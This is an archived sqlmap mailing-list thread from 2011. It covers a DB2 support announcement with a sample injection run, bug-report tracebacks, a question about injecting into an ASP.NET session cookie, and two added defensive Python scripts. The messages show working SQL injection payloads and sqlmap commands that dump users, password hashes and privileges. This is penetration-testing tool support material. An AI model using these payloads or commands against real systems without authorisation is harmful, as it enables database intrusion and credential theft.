2011/7/6 Bernardo Damele A. G. <ber...@gm...>
> Hi,
>
> Update on IBM DB2 support: payload for time-based has been added[1]
> last week as well as support for direct connection (-d switch).
>
> [1] https://twitter.com/#!/sqlmap/status/85659702565937152
>
>
> On 25 June 2011 11:04, Bernardo Damele A. G. <ber...@gm...> wrote:
> > Hi,
> >
> > The long awaited IBM DB2 support has been implemented in sqlmap. The
> > patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
> > and merged in sqlmap repository after some tweaking by us. It is very
> > stable for both DB2 8.x and 9.x branches.
> > The patch includes support to fingerprint and enumerate data on IBM
> > DB2 via boolean-based blind SQL injection and UNION query SQL
> > injection. Hopefully, soon someone will come up with a payload for
> > time-based and error-based techniques too. Support for direct
> > connection to the DBMS (-d switch) will be implemented soon as well.
> >
> > Thank you Sebastian and the rest of the team at r-tec for your patch
> > and support!
> >
> > Sample run against an IBM DB2 9.7 test environment:
> > --8<--
> > $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
> >
> > sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
> > http://sqlmap.sourceforge.net
> >
> > [!] legal disclaimer: usage of sqlmap for attacking targets without
> > prior mutual consent is illegal. It is the end user's responsibility
> > to obey all applicable local, state and federal laws. Authors assume
> > no liability and are not responsible for any misuse or damage caused
> > by this program
> >
> > [*] starting at 10:56:21
> >
> > [10:56:21] [INFO] using '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session' as session file
> > [10:56:21] [INFO] testing connection to the target url
> > [10:56:23] [INFO] heuristics detected web page charset 'ascii'
> > [10:56:23] [INFO] testing if the url is stable, wait a few seconds
> > [10:56:25] [INFO] url is stable
> > [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
> > [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
> > [10:56:26] [INFO] GET parameter 'id' is dynamic
> > [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: DB2)
> > [10:56:27] [INFO] testing sql injection on GET parameter 'id'
> > [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> > [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
> > parsed error message(s) showed that the back-end DBMS could be DB2. Do you want to skip test payloads specific for other DBMSes? [Y/n]
> > [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> > [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
> > [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
> > GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
> > sqlmap identified the following injection points with a total of 21 HTTP(s) requests:
> > ---
> > Place: GET
> > Parameter: id
> > Type: boolean-based blind
> > Title: AND boolean-based blind - WHERE or HAVING clause
> > Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
> >
> > Type: UNION query
> > Title: Generic UNION query (NULL) - 1 to 10 columns
> > Payload: id=1' UNION ALL SELECT CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58) FROM SYSIBM.SYSDUMMY1-- AND 'QrLM'='QrLM
> > ---
> >
> > [10:58:58] [INFO] testing IBM DB2
> > [10:58:59] [INFO] confirming IBM DB2
> > [10:59:12] [INFO] the back-end DBMS is IBM DB2
> > web server operating system: Windows
> > web application technology: PHP 5.3.5, Apache 2.2.17
> > back-end DBMS: active fingerprint: IBM DB2 9.7
> > html error message fingerprint: DB2
> > [10:59:12] [INFO] fetching banner
> > banner: 'DB2 v9.7.400.501'
> >
> > [10:59:13] [INFO] fetching current user
> > current user: 'TEST'
> > --8<--
> >
> > Bernardo
> >
> > --
> > Bernardo Damele A. G.
> > E-mail / Jabber: bernardo.damele (at) gmail.com
> > Mobile: +447788962949 (UK 07788962949)
> > PGP Key ID: Unavailable
>
> --
> Bernardo Damele A. G.
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
From: Miroslav S. <mir...@gm...> - 2011-08-10 09:17:28

Hi Vladimir.

Thank you for your report. We'll do something about it. In the mean time you can experiment with --technique (other than U) or --start/--stop.

If there is no alternative please contact me privately and i'll make you a temporary patch.

That idea with end char is great. We'll try to use it in detection phase.

Kr

On 9.8.2011. 22:34, "Vladimir Rutsky" <rut...@gm...> wrote:
From: Vladimir R. <rut...@gm...> - 2011-08-09 20:34:10

Hello!

Consider the following example of a vulnerability. The server has PHP and MySQL 5.X. The URL http://example.com/list.php?filter=text outputs a list of items that match the filter and is vulnerable to the following SQL injection:

http://example.com/list.php?filter=' UNION SELECT 1,2,3 --

This will show one row with some values 1, 2 and 3.

sqlmap works with such a URL when queried in the following way:

$ ./sqlmap.py -u http://example.com/list.php?filter=text \
    -p filter --prefix "' " --suffix ' -- ' --tables -D db

--- will output the list of tables in the `db' database.

The problem is that the vulnerable list.php script limits the number of outputted items --- it always shows only the first 10 items, omitting the others on the PHP level (without using a MySQL LIMIT clause), so sqlmap incorrectly detects the number of columns, number of rows etc --- always limiting the number of items to 10.

I looked in the documentation and didn't find any options for splitting enumeration requests into a bunch of requests limited by some number of outputted items (e.g. query all table rows selecting 10 rows per single query). Can you add such options or tell me how I can achieve my goal with the current version of sqlmap (I'm using the trunk version)?

Also I want to propose checking whether all of the requested items were received by adding an extra UNION SELECT at the end with some end mark and checking whether that end mark is received. I don't know the details of sqlmap's implementation so I'm not sure whether my proposition is correct.

Thanks in advance,
Vladimir Rutsky
From: Miroslav S. <mir...@gm...> - 2011-08-09 14:14:19

hi John.

thank you for your report. find it fixed in the latest commit.

kr

On Mon, Aug 8, 2011 at 8:46 AM, John Cobb <jo...@no...> wrote:
> [23:07:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
>
> sqlmap version: 1.0-dev (r4332)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py --tor --user-agent=PenTest --threads 4 --users --passwords --privileges -u ***********
> Technique: TIME
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/opt/sqlmap/lib/controller/controller.py", line 561, in start
>     action()
>   File "/opt/sqlmap/lib/controller/action.py", line 77, in action
>     conf.dbmsHandler.getPasswordHashes(), "password hash")
>   File "/opt/sqlmap/plugins/generic/enumeration.py", line 287, in getPasswordHashes
>     for user, password in value:
> ValueError: need more than 1 value to unpack
>
> [*] shutting down at 23:07:56

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: machak m. <mma...@gm...> - 2011-08-09 13:16:43
Please discard my last report... it was my mistake... :((

2011/8/9 machak machakowitz <mma...@gm...>
>
> C:\Users\Giga\Desktop\sqlmap1> sqlmap.py -u "http://***************************.php?show=galleries&gallery=252§ion=8" --auth-type=basic --auth-cred "*****:****" --dbms=mysql -o --random-agent -D ****** -T users --columns
>
> sqlmap/1.0-dev (r4332) - automatic SQL injection and database takeover tool
> http://www.sqlmap.org
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Authors assume no liability and
> are not responsible for any misuse or damage caused by this program
>
> [*] starting at 14:18:33
>
> [14:18:33] [INFO] fetched random HTTP User-Agent header from file
> 'C:\Users\Giga\Desktop\sqlmap1\txt\user-agents.txt': Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
> [14:18:33] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
> disabled because of it's incompatibility with authentication methods
> [14:18:33] [INFO] using 'C:\Users\Giga\Desktop\sqlmap1\output\*****************\session' as session file
> [14:18:33] [INFO] testing connection to the target url
> [14:18:34] [INFO] heuristics detected web page charset 'ascii'
> [14:18:34] [WARNING] there is a DBMS error found in the HTTP response body
> which could interfere with the results of the tests
> [14:18:34] [INFO] testing NULL connection to the target url
>
> [14:18:34] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to ********************************** the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get back to you.
>
> sqlmap version: 1.0-dev (r4332)
> Python version: 2.7.1
> Operating system: nt
> Command line: C:\Users\Giga\Desktop\sqlmap1\sqlmap.py -u *************************************************************************** --auth-type=basic --auth-cred ************** --dbms=mysql -o --random-agent -D ******** -T ***** --columns
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "C:\Users\Giga\Desktop\sqlmap1\sqlmap.py", line 86, in main
>     start()
>   File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\controller.py", line 334, in start
>     checkNullConnection()
>   File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\checks.py", line 900, in checkNullConnection
>     page, headers = Request.getPage(method=HTTPMETHOD.HEAD)
>   File "C:\Users\Giga\Desktop\sqlmap1\lib\request\connect.py", line 281, in getPage
>     conn = urllib2.urlopen(req)
>   File "C:\Python27\lib\urllib2.py", line 126, in urlopen
>     return _opener.open(url, data, timeout)
>   File "C:\Python27\lib\urllib2.py", line 392, in open
>     response = self._open(req, data)
>   File "C:\Python27\lib\urllib2.py", line 410, in _open
>     '_open', req)
>   File "C:\Python27\lib\urllib2.py", line 370, in _call_chain
>     result = func(*args)
>   File "C:\Python27\lib\urllib2.py", line 1186, in http_open
>     return self.do_open(httplib.HTTPConnection, req)
>   File "C:\Python27\lib\urllib2.py", line 1155, in do_open
>     h.request(req.get_method(), req.get_selector(), req.data, headers)
>   File "C:\Python27\lib\httplib.py", line 941, in request
>     self._send_request(method, url, body, headers)
>   File "C:\Python27\lib\httplib.py", line 975, in _send_request
>     self.endheaders(body)
>   File "C:\Python27\lib\httplib.py", line 937, in endheaders
>     self._send_output(message_body)
>   File "C:\Python27\lib\httplib.py", line 797, in _send_output
>     self.send(msg)
>   File "C:\Python27\lib\httplib.py", line 773, in send
>     self.sock.sendall(data)
>   File "C:\Python27\lib\socket.py", line 224, in meth
>     return getattr(self._sock,name)(*args)
> UnicodeEncodeError: 'ascii' codec can't encode character u'\xa7' in position 44: ordinal not in range(128)
>
> [*] shutting down at 14:18:34
>
> C:\Users\Giga\Desktop\sqlmap1>
>
> Don't know why the e-mail address for reporting bugs is also hidden...
From: machak m. <mma...@gm...> - 2011-08-09 12:31:46
C:\Users\Giga\Desktop\sqlmap1> sqlmap.py -u "http://***************************.php?show=galleries&gallery=252§ion=8" --auth-type=basic --auth-cred "*****:****" --dbms=mysql -o --random-agent -D ****** -T users --columns

sqlmap/1.0-dev (r4332) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Authors assume no liability and
are not responsible for any misuse or damage caused by this program

[*] starting at 14:18:33

[14:18:33] [INFO] fetched random HTTP User-Agent header from file
'C:\Users\Giga\Desktop\sqlmap1\txt\user-agents.txt': Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00
[14:18:33] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
disabled because of it's incompatibility with authentication methods
[14:18:33] [INFO] using 'C:\Users\Giga\Desktop\sqlmap1\output\*****************\session' as session file
[14:18:33] [INFO] testing connection to the target url
[14:18:34] [INFO] heuristics detected web page charset 'ascii'
[14:18:34] [WARNING] there is a DBMS error found in the HTTP response body
which could interfere with the results of the tests
[14:18:34] [INFO] testing NULL connection to the target url

[14:18:34] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to ********************************** the
following text and any information required to reproduce the bug. The
developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev (r4332)
Python version: 2.7.1
Operating system: nt
Command line: C:\Users\Giga\Desktop\sqlmap1\sqlmap.py -u *************************************************************************** --auth-type=basic --auth-cred ************** --dbms=mysql -o --random-agent -D ******** -T ***** --columns
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "C:\Users\Giga\Desktop\sqlmap1\sqlmap.py", line 86, in main
    start()
  File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\controller.py", line 334, in start
    checkNullConnection()
  File "C:\Users\Giga\Desktop\sqlmap1\lib\controller\checks.py", line 900, in checkNullConnection
    page, headers = Request.getPage(method=HTTPMETHOD.HEAD)
  File "C:\Users\Giga\Desktop\sqlmap1\lib\request\connect.py", line 281, in getPage
    conn = urllib2.urlopen(req)
  File "C:\Python27\lib\urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "C:\Python27\lib\urllib2.py", line 392, in open
    response = self._open(req, data)
  File "C:\Python27\lib\urllib2.py", line 410, in _open
    '_open', req)
  File "C:\Python27\lib\urllib2.py", line 370, in _call_chain
    result = func(*args)
  File "C:\Python27\lib\urllib2.py", line 1186, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "C:\Python27\lib\urllib2.py", line 1155, in do_open
    h.request(req.get_method(), req.get_selector(), req.data, headers)
  File "C:\Python27\lib\httplib.py", line 941, in request
    self._send_request(method, url, body, headers)
  File "C:\Python27\lib\httplib.py", line 975, in _send_request
    self.endheaders(body)
  File "C:\Python27\lib\httplib.py", line 937, in endheaders
    self._send_output(message_body)
  File "C:\Python27\lib\httplib.py", line 797, in _send_output
    self.send(msg)
  File "C:\Python27\lib\httplib.py", line 773, in send
    self.sock.sendall(data)
  File "C:\Python27\lib\socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
UnicodeEncodeError: 'ascii' codec can't encode character u'\xa7' in position 44: ordinal not in range(128)

[*] shutting down at 14:18:34

C:\Users\Giga\Desktop\sqlmap1>

Don't know why the e-mail address for reporting bugs is also hidden...
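The UnicodeEncodeError in the report above (and in the retracted copy quoted earlier in the thread) is raised when a non-ASCII character, U+00A7 (§), reaches Python 2's httplib, which writes the request line as ASCII. The command line on the page shows "gallery=252§ion=8", and "&sect" is one of the legacy HTML named references that decodes without a trailing semicolon, so an HTML-entity decode of "&section=8" is a plausible origin; that is an inference, not something the report states. The Python 3 script below is an added example, not sqlmap code or anything from the list; the host, path and function names are constructed for illustration. It locates non-ASCII characters in a URL, shows an ASCII-only request line failing the same way, converts the IRI to a percent-encoded URI that any HTTP client will send, and reproduces the entity-decode mangling.

```python
import html
from urllib.parse import quote, urlsplit, urlunsplit

# Constructed sample: "&section=8" after "&sect" has been turned into U+00A7,
# the character the traceback above names. Hypothetical host and path.
SAMPLE_URL = "http://example.test/gallery.php?show=galleries&gallery=252§ion=8"

# Characters that may stay literal in a path/query/fragment: RFC 3986 reserved
# and unreserved characters, plus "%" so existing escapes are not double-encoded.
_SAFE = "%/:@!$&'()*+,;=?~-._"


def find_non_ascii(url):
    """Return (offset, character) for every code point above 0x7F in url."""
    return [(i, ch) for i, ch in enumerate(url) if ord(ch) > 0x7F]


def request_line(url):
    """Build the HTTP request line as bytes. Like the Python 2 httplib in the
    traceback, this insists on ASCII, so an unencoded non-ASCII character
    raises UnicodeEncodeError instead of silently sending something else."""
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return ("GET %s HTTP/1.1\r\n" % target).encode("ascii")


def iri_to_uri(url):
    """Percent-encode non-ASCII characters in path, query and fragment as
    UTF-8, which is what a browser does before a URL goes on the wire. The
    host part is left untouched (IDNA handling is out of scope here)."""
    parts = urlsplit(url)
    return urlunsplit((
        parts.scheme,
        parts.netloc,
        quote(parts.path, safe=_SAFE),
        quote(parts.query, safe=_SAFE),
        quote(parts.fragment, safe=_SAFE),
    ))


def entity_decoded(url):
    """Apply an HTML entity decode to a URL. "&sect" is a legacy named
    reference that HTML accepts without a semicolon, so "&section=8" comes
    out as "§ion=8": one plausible way the character got into the command
    line (an inference, not something the report states)."""
    return html.unescape(url)


if __name__ == "__main__":
    print(find_non_ascii(SAMPLE_URL))
    try:
        request_line(SAMPLE_URL)
    except UnicodeEncodeError as exc:
        print("raw URL:", exc)
    fixed = iri_to_uri(SAMPLE_URL)
    print("encoded:", fixed)
    print(request_line(fixed))
    clean = "http://example.test/gallery.php?show=galleries&gallery=252&section=8"
    print(entity_decoded(clean) == SAMPLE_URL)
```

Running a target URL through find_non_ascii before handing it to any tool is a cheap sanity check: a stray non-ASCII character in a copy-pasted URL usually means the parameter name or value is not what it looks like, and the request will either fail as above or probe the wrong parameter.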
From: John C. <jo...@no...> - 2011-08-08 07:25:06
[23:07:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4332), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.

sqlmap version: 1.0-dev (r4332)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py --tor --user-agent=PenTest --threads 4 --users --passwords --privileges -u ***********
Technique: TIME
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/opt/sqlmap/lib/controller/controller.py", line 561, in start
    action()
  File "/opt/sqlmap/lib/controller/action.py", line 77, in action
    conf.dbmsHandler.getPasswordHashes(), "password hash")
  File "/opt/sqlmap/plugins/generic/enumeration.py", line 287, in getPasswordHashes
    for user, password in value:
ValueError: need more than 1 value to unpack

[*] shutting down at 23:07:56
From: Miroslav S. <mir...@gm...> - 2011-08-03 09:04:59
hi. fixed and committed. thank you for your report.

kr

2011/8/3 anonymous anonymous <tm...@2c...>:
> [01:06:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4324), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4324)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u ********************************************************** --threads 50 --union-cols=56 --technique=U -T *** --search
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 86, in main
>     start()
>   File "/root/sqlmap/lib/controller/controller.py", line 555, in start
>     action()
>   File "/root/sqlmap/lib/controller/action.py", line 115, in action
>     conf.dbmsHandler.search()
>   File "/root/sqlmap/plugins/generic/enumeration.py", line 2340, in search
>     conf.dumper.dbTables(self.searchTable())
>   File "/root/sqlmap/plugins/generic/enumeration.py", line 2038, in searchTable
>     for foundDb, foundTbl in values:
> ValueError: need more than 0 values to unpack
> [*] shutting down at 01:06:54

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
From: anonymous a. <tm...@2c...> - 2011-08-02 23:23:26
[01:06:54] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4324), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4324)
Python version: 2.6.6
Operating system: posix
Command line: ./sqlmap.py -u ********************************************************** --threads 50 --union-cols=56 --technique=U -T *** --search
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/root/sqlmap/lib/controller/controller.py", line 555, in start
    action()
  File "/root/sqlmap/lib/controller/action.py", line 115, in action
    conf.dbmsHandler.search()
  File "/root/sqlmap/plugins/generic/enumeration.py", line 2340, in search
    conf.dumper.dbTables(self.searchTable())
  File "/root/sqlmap/plugins/generic/enumeration.py", line 2038, in searchTable
    for foundDb, foundTbl in values:
ValueError: need more than 0 values to unpack
[*] shutting down at 01:06:54
From: Robin W. <ro...@di...> - 2011-08-02 17:54:25
On 2 August 2011 18:30, Miroslav Stampar <mir...@gm...> wrote:
> hi Robin
>
> you'll need to give a valid Cookie with
> --cookie="....&ASP.NET_SessionId=1FA...&..." and use -p
> "ASP.NET_SessionId"
>
> thing is that when level < 4 we ignore session-like parameters in
> default cases. so, either you can use explicit -p "ASP.NET_SessionId"
> or you can use --level=4. in your case i would suggest usage of -p.
>
> kr

Thanks, I'll give that a try.

Robin

> On Tue, Aug 2, 2011 at 2:41 PM, Robin Wood <ro...@di...> wrote:
>> Hi
>> I've got an application that is vulnerable to SQLi in one of two
>> cookie parameters. The one that is injectable is the ASP.NET_SessionId
>> which has to start with a valid session id but then if given an extra
>> ' on the end it fails and dumps out a nice SQL error.
>>
>> So what I need to do is to tell sqlmap to inject onto the end of the
>> one cookie but leave the other intact. Is this possible?
>>
>> Robin
>
> --
> Miroslav Stampar (@stamparm)
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
From: Miroslav S. <mir...@gm...> - 2011-08-02 17:31:02
hi Robin

you'll need to give a valid Cookie with
--cookie="....&ASP.NET_SessionId=1FA...&..." and use -p "ASP.NET_SessionId"

thing is that when level < 4 we ignore session-like parameters in
default cases. so, either you can use explicit -p "ASP.NET_SessionId"
or you can use --level=4. in your case i would suggest usage of -p.

kr

On Tue, Aug 2, 2011 at 2:41 PM, Robin Wood <ro...@di...> wrote:
> Hi
> I've got an application that is vulnerable to SQLi in one of two
> cookie parameters. The one that is injectable is the ASP.NET_SessionId
> which has to start with a valid session id but then if given an extra
> ' on the end it fails and dumps out a nice SQL error.
>
> So what I need to do is to tell sqlmap to inject onto the end of the
> one cookie but leave the other intact. Is this possible?
>
> Robin

--
Miroslav Stampar (@stamparm)
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
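Miroslav's answer above covers how to test a session cookie with sqlmap. The defender's side of the same finding, an ASP.NET_SessionId that is accepted as long as it starts with a valid id and produces a database error once a quote is appended, is to validate the cookie value before it reaches a query and to look for malformed values in request logs. The Python script below is an added example, not sqlmap or mailing-list code. It assumes the ASP.NET session id format of 24 characters drawn from [a-z0-5], a constructed log line layout (timestamp, client, request line, status, Cookie header), constructed log lines, and an in-memory SQLite table standing in for the application's session store.

```python
import re
import sqlite3

# ASP.NET session identifiers: 24 characters from the alphabet [a-z0-5]
# (assumed format, stated in the lead-in). Anything else is not an id the
# framework would have issued, whatever the application does with it.
ASPNET_SESSION_RE = re.compile(r"^[a-z0-5]{24}$")

# Constructed log layout: timestamp, client, request line, status, Cookie header.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) "(?P<request>[^"]*)" (?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)

# Constructed sample data. The second line is a well-formed id with a single
# quote appended, answered with a 500: the shape Robin describes above.
VALID_SID = "qz3k5a1m0p2vwx4e5rtyu1lo"
SAMPLE_LOG = [
    '2011-08-02T13:41:00Z 203.0.113.5 "GET /account/orders.aspx" 200 "ASP.NET_SessionId=%s; pref=light"' % VALID_SID,
    '2011-08-02T13:41:07Z 203.0.113.5 "GET /account/orders.aspx" 500 "ASP.NET_SessionId=%s\'; pref=light"' % VALID_SID,
    '2011-08-02T13:41:09Z 198.51.100.7 "GET /account/orders.aspx" 200 "pref=dark"',
]


def is_well_formed_session_id(value):
    """True only for a value that matches the assumed ASP.NET session-id format."""
    return bool(ASPNET_SESSION_RE.match(value))


def parse_cookie_header(header):
    """Split a Cookie request header into {name: value} without rejecting odd
    characters, so a tampered value is kept for inspection rather than dropped."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


def audit_log(lines, cookie_name="ASP.NET_SessionId"):
    """Return one finding per request whose session cookie is present but malformed."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these
        sid = parse_cookie_header(m.group("cookie")).get(cookie_name)
        if sid is None or is_well_formed_session_id(sid):
            continue
        findings.append({
            "ts": m.group("ts"),
            "client": m.group("client"),
            "status": m.group("status"),
            "value": sid,
            "reason": "%s value is not a well-formed session id" % cookie_name,
        })
    return findings


def make_demo_db():
    """In-memory stand-in for the application's session table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY, username TEXT)")
    conn.execute("INSERT INTO sessions VALUES (?, ?)", (VALID_SID, "alice"))
    return conn


def lookup_session(conn, sid):
    """Reject malformed ids up front and bind the value as a parameter; the
    cookie text never becomes part of the SQL text, so a stray quote cannot
    change the statement or trigger the database error the thread mentions."""
    if not is_well_formed_session_id(sid):
        return None
    row = conn.execute("SELECT username FROM sessions WHERE id = ?", (sid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for f in audit_log(SAMPLE_LOG):
        print("%(ts)s %(client)s status=%(status)s %(reason)s: %(value)r" % f)
    conn = make_demo_db()
    print(lookup_session(conn, VALID_SID), lookup_session(conn, VALID_SID + "'"))
```

The validation step is what makes the log check and the query fix the same rule: a value that fails the format check is refused by lookup_session and flagged by audit_log, so a single regular expression defines both what the application accepts and what the log review reports. Pairing malformed-cookie findings with 5xx responses from the same client, as in the second sample line, is a useful triage signal for this class of probe.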